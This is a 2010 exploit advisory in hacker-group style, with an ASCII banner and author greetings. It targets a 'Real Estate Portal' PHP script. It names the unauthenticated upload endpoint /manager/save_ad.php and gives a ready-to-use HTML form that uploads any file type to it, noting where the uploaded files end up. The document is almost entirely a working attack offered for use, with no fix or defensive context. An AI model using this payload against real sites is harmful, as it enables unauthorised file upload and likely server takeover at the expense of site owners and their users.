______                _       _   _             
      | ___ \              | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   
      | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |   
      \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
         | |  __/ (_| | | | | | | \ |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/
         
                           DEFACEMENT it's for script kiddies...
_____________________________________________________________
   
[$] Exploit Title     : Real Estate Portal Remote File Upload
[$] Date              : 24-05-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Remote File Upload
[$] Script            : http://hostnomi.net/detail.php?spid=44
[$] Demo              : http://hostnomi.net/int/
[$] Google Dork       : n/a


[%] vulnerable file: /manager/save_ad.php

[REMOTE UPLOAD VULNERABILITY]

[$] Exploit:

<html>
Note: You can upload any filetype =P
<form action="<!-- CHANGE HERE -->/manager/save_ad.php?id=" method="post" enctype="multipart/form-data" name="frmBanner">
<input type="file" name="image" class="inputt"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>
<p>Files go to http://example.pt/ads/</p>
<!-- Discovered by MasterGipy -->
</html>




[§] Greetings from PORTUGAL ^^